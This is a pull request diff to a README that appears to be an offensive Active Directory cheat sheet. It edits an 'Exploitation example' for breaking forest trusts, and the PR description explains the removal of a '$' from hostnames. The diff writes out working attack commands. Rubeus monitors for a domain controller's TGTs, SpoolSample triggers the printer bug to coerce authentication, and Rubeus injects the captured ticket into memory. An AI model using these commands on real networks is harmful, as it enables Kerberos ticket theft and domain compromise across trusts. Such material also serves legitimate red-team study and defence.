### PR TITLE
Update README.md

### DIFF
--- a/README.md
+++ b/README.md
@@ -1310,10 +1310,10 @@ Exploitation example:
 
 ```powershell
 #Start monitoring for TGTs with rubeus:
-Rubeus.exe monitor /interval:5 /filteruser:target-dc$
+Rubeus.exe monitor /interval:5 /filteruser:target-dc
 
 #Execute the printerbug to trigger the force authentication of the target DC to our machine
-SpoolSample.exe target-dc$.external.forest.local dc.compromised.domain.local
+SpoolSample.exe target-dc.external.forest.local dc.compromised.domain.local
 
 #Get the base64 captured TGT from Rubeus and inject it into memory:
 Rubeus.exe ptt /ticket:<Base64ValueofCapturedTicket>


### PR DESCRIPTION
Removed $ from Breaking Forest Trusts > Exploitation example to prevent confusion of mistaking it for the Computer Object, we only need the DC's hostname